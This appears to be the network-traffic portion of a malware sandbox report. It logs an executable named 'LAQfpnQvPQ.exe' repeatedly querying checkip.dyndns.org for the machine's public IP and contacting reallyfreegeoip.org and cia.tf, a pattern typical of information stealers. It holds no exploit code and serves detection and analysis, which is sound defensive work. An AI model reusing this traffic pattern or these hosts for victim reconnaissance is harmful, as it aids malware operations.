                                                                        Nov 25, 2024 14:59:34.199599028 CET49752443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 14:59:34.204266071 CET4974580192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 14:59:34.205621958 CET4975480192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 14:59:34.253845930 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.253876925 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.253952980 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.253968954 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.254008055 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.259614944 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.259639025 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.259694099 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.259701967 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.259735107 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.259753942 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.265763044 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.265789032 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.265841007 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.265849113 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.265889883 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.271218061 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.271239042 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.271305084 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.271318913 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.271369934 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.277503967 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.277529001 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.277581930 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.277590036 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.277621984 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.277640104 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.283376932 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.283401012 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.283446074 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.283462048 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.283490896 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.283514977 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.289716005 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.289736986 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.289772987 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.289781094 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.289803982 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.289822102 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.295737028 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.295758009 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.295844078 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.295854092 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.295916080 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.324693918 CET8049745193.122.130.0192.168.2.5
                                                                        Nov 25, 2024 14:59:34.325686932 CET8049754193.122.130.0192.168.2.5
                                                                        Nov 25, 2024 14:59:34.325691938 CET4974580192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 14:59:34.325764894 CET4975480192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 14:59:34.325927019 CET4975480192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 14:59:34.446059942 CET8049754193.122.130.0192.168.2.5
                                                                        Nov 25, 2024 14:59:34.455068111 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.455096006 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.455193996 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.455218077 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.455265999 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.460716009 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.460731983 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.460833073 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.460848093 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.460908890 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.466903925 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.466921091 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.466970921 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.466981888 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.467025042 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.467046022 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.473196030 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.473221064 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.473268986 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.473278046 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.473309040 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.473330021 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.478646040 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.478676081 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.478735924 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.478743076 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.478770971 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.478790045 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.484482050 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.484499931 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.484577894 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.484586954 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.484642029 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.490714073 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.490731001 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.490772009 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.490799904 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.490818024 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.490838051 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.496881008 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.496897936 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.496952057 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.496958971 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.496998072 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.656589985 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.656630993 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.656683922 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.656698942 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.656732082 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.656753063 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.662197113 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.662233114 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.662277937 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.662291050 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.662322998 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.662343025 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.668272018 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.668306112 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.668344975 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.668350935 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.668380976 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.668401003 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.673646927 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.673669100 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:34.673736095 CET49746443192.168.2.5104.21.1.182
                                                                        Nov 25, 2024 14:59:34.673744917 CET44349746104.21.1.182192.168.2.5
                                                                        Nov 25, 2024 14:59:58.374419928 CET8049821193.122.130.0192.168.2.5
                                                                        Nov 25, 2024 14:59:59.450124979 CET8049821193.122.130.0192.168.2.5
                                                                        Nov 25, 2024 14:59:59.451507092 CET49824443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 14:59:59.451520920 CET44349824172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 14:59:59.451612949 CET49824443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 14:59:59.451864004 CET49824443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 14:59:59.451877117 CET44349824172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 14:59:59.495922089 CET4982180192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 15:00:00.763479948 CET44349824172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:00.765157938 CET49824443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:00.765199900 CET44349824172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:01.235207081 CET44349824172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:01.235270023 CET44349824172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:01.235326052 CET49824443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:01.235785961 CET49824443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:01.240135908 CET4983080192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 15:00:01.360390902 CET8049830193.122.130.0192.168.2.5
                                                                        Nov 25, 2024 15:00:01.360626936 CET4983080192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 15:00:01.360769033 CET4983080192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 15:00:01.480926037 CET8049830193.122.130.0192.168.2.5
                                                                        Nov 25, 2024 15:00:10.898750067 CET8049830193.122.130.0192.168.2.5
                                                                        Nov 25, 2024 15:00:10.900017977 CET49851443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:10.900051117 CET44349851172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:10.900122881 CET49851443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:10.900338888 CET49851443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:10.900352001 CET44349851172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:10.949069023 CET4983080192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 15:00:12.269866943 CET44349851172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:12.271809101 CET49851443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:12.271866083 CET44349851172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:12.752104998 CET44349851172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:12.752185106 CET44349851172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:12.752244949 CET49851443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:12.758013964 CET49851443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:12.986778021 CET4983080192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 15:00:12.988456011 CET4985680192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 15:00:13.108549118 CET8049856193.122.130.0192.168.2.5
                                                                        Nov 25, 2024 15:00:13.108644962 CET4985680192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 15:00:13.108895063 CET4985680192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 15:00:13.121397972 CET8049830193.122.130.0192.168.2.5
                                                                        Nov 25, 2024 15:00:13.121510983 CET4983080192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 15:00:13.228818893 CET8049856193.122.130.0192.168.2.5
                                                                        Nov 25, 2024 15:00:18.952763081 CET8049856193.122.130.0192.168.2.5
                                                                        Nov 25, 2024 15:00:18.954926968 CET49872443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:18.954991102 CET44349872172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:18.955099106 CET49872443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:18.955476046 CET49872443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:18.955497026 CET44349872172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:18.995989084 CET4985680192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 15:00:20.260253906 CET44349872172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:20.262305021 CET49872443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:20.262326956 CET44349872172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:20.747086048 CET44349872172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:20.747153044 CET44349872172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:20.747288942 CET49872443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:20.748012066 CET49872443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:20.752882004 CET4985680192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 15:00:20.754118919 CET4987780192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 15:00:20.873219967 CET8049856193.122.130.0192.168.2.5
                                                                        Nov 25, 2024 15:00:20.873280048 CET4985680192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 15:00:20.874305964 CET8049877193.122.130.0192.168.2.5
                                                                        Nov 25, 2024 15:00:20.874392986 CET4987780192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 15:00:20.874562979 CET4987780192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 15:00:20.994585991 CET8049877193.122.130.0192.168.2.5
                                                                        Nov 25, 2024 15:00:26.039747000 CET8049877193.122.130.0192.168.2.5
                                                                        Nov 25, 2024 15:00:26.044745922 CET49889443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:26.044792891 CET44349889172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:26.044929981 CET49889443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:26.045206070 CET49889443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:26.045218945 CET44349889172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:26.089657068 CET4987780192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 15:00:27.260468960 CET44349889172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:27.262775898 CET49889443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:27.262794018 CET44349889172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:27.891269922 CET44349889172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:27.891346931 CET44349889172.67.177.134192.168.2.5
                                                                        Nov 25, 2024 15:00:27.891413927 CET49889443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:27.891952038 CET49889443192.168.2.5172.67.177.134
                                                                        Nov 25, 2024 15:00:46.562621117 CET8049772193.122.130.0192.168.2.5
                                                                        Nov 25, 2024 15:00:46.562680006 CET4977280192.168.2.5193.122.130.0
                                                                        Nov 25, 2024 15:01:04.450347900 CET8049821193.122.130.0192.168.2.5
                                                                        Nov 25, 2024 15:01:04.451270103 CET4982180192.168.2.5193.122.130.0
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Nov 25, 2024 14:59:01.827379942 CET | 51772 | 53 | 192.168.2.5 | 1.1.1.1 |
| Nov 25, 2024 14:59:02.078649998 CET | 53 | 51772 | 1.1.1.1 | 192.168.2.5 |
| Nov 25, 2024 14:59:18.751571894 CET | 56848 | 53 | 192.168.2.5 | 1.1.1.1 |
| Nov 25, 2024 14:59:18.890959024 CET | 53 | 56848 | 1.1.1.1 | 192.168.2.5 |
| Nov 25, 2024 14:59:20.634512901 CET | 49278 | 53 | 192.168.2.5 | 1.1.1.1 |
| Nov 25, 2024 14:59:20.978183985 CET | 53 | 49278 | 1.1.1.1 | 192.168.2.5 |

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Nov 25, 2024 14:59:01.827379942 CET | 192.168.2.5 | 1.1.1.1 | 0x461a | Standard query (0) | cia.tf | A (IP address) | IN (0x0001) | false |
| Nov 25, 2024 14:59:18.751571894 CET | 192.168.2.5 | 1.1.1.1 | 0xc8d | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false |
| Nov 25, 2024 14:59:20.634512901 CET | 192.168.2.5 | 1.1.1.1 | 0xfd7 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Nov 25, 2024 14:59:02.078649998 CET | 1.1.1.1 | 192.168.2.5 | 0x461a | No error (0) | cia.tf | | 104.21.1.182 | A (IP address) | IN (0x0001) | false |
| Nov 25, 2024 14:59:02.078649998 CET | 1.1.1.1 | 192.168.2.5 | 0x461a | No error (0) | cia.tf | | 172.67.129.178 | A (IP address) | IN (0x0001) | false |
| Nov 25, 2024 14:59:18.890959024 CET | 1.1.1.1 | 192.168.2.5 | 0xc8d | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Nov 25, 2024 14:59:18.890959024 CET | 1.1.1.1 | 192.168.2.5 | 0xc8d | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false |
| Nov 25, 2024 14:59:18.890959024 CET | 1.1.1.1 | 192.168.2.5 | 0xc8d | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false |
| Nov 25, 2024 14:59:18.890959024 CET | 1.1.1.1 | 192.168.2.5 | 0xc8d | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false |
| Nov 25, 2024 14:59:18.890959024 CET | 1.1.1.1 | 192.168.2.5 | 0xc8d | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false |
| Nov 25, 2024 14:59:18.890959024 CET | 1.1.1.1 | 192.168.2.5 | 0xc8d | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false |
| Nov 25, 2024 14:59:20.978183985 CET | 1.1.1.1 | 192.168.2.5 | 0xfd7 | No error (0) | reallyfreegeoip.org | | 172.67.177.134 | A (IP address) | IN (0x0001) | false |
| Nov 25, 2024 14:59:20.978183985 CET | 1.1.1.1 | 192.168.2.5 | 0xfd7 | No error (0) | reallyfreegeoip.org | | 104.21.67.152 | A (IP address) | IN (0x0001) | false |

                                                                        • cia.tf
                                                                        • reallyfreegeoip.org
                                                                        • checkip.dyndns.org
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.5 | 49712 | 193.122.130.0 | 80 | 6364 | C:\Users\user\Desktop\LAQfpnQvPQ.exe |

Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 14:59:19.019103050 CET | 151 | OUT | GET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
Nov 25, 2024 14:59:20.206801891 CET | 320 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:20 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 71e2d40b384f584618c52b9b9643d249
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 25, 2024 14:59:20.210952997 CET | 127 | OUT | GET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
Nov 25, 2024 14:59:20.549824953 CET | 320 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:20 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 4b22910e5d2cf2343d81dc66ed893580
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 25, 2024 14:59:23.048497915 CET | 127 | OUT | GET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
Nov 25, 2024 14:59:23.387872934 CET | 320 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:23 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 68bc8a9acd175f36aa45c2016554eea8
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.5 | 49727 | 193.122.130.0 | 80 | 6364 | C:\Users\user\Desktop\LAQfpnQvPQ.exe |

Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 14:59:25.183823109 CET | 127 | OUT | GET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
Nov 25, 2024 14:59:26.279597044 CET | 320 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:26 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: a3eabf0d3eb7ce2658f036a273032724
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 2 | 192.168.2.5 | 49738 | 193.122.130.0 | 80 | 6364 | C:\Users\user\Desktop\LAQfpnQvPQ.exe |

Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 14:59:28.134361982 CET | 151 | OUT | GET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
Nov 25, 2024 14:59:29.337124109 CET | 320 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:29 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: d0da23e1583569f8e81a277688c67448
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 3 | 192.168.2.5 | 49745 | 193.122.130.0 | 80 | 6364 | C:\Users\user\Desktop\LAQfpnQvPQ.exe |

Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 14:59:31.244891882 CET | 151 | OUT | GET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
Nov 25, 2024 14:59:32.462486029 CET | 320 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:32 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 4b8f52ba9e2fc0534638c1e523bfc8e7
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 4 | 192.168.2.5 | 49754 | 193.122.130.0 | 80 | 6364 | C:\Users\user\Desktop\LAQfpnQvPQ.exe |

Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 14:59:34.325927019 CET | 151 | OUT | GET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
Nov 25, 2024 14:59:35.468415976 CET | 320 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:35 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: e9cf38e5eda87e89198d4b84392cb582
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        5 | 192.168.2.5 | 49765 | 193.122.130.0 | 80 | 6364 | C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 25, 2024 14:59:37.409106970 CET | 151 | OUT | GET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Nov 25, 2024 14:59:38.515835047 CET | 320 | IN | HTTP/1.1 200 OK
                                                                        Date: Mon, 25 Nov 2024 13:59:38 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 103
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: b342b26ed45220479154b99d4b7421d1
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        6 | 192.168.2.5 | 49772 | 193.122.130.0 | 80 | 6364 | C:\Users\user\Desktop\LAQfpnQvPQ.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 25, 2024 14:59:40.418848991 CET | 151 | OUT | GET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
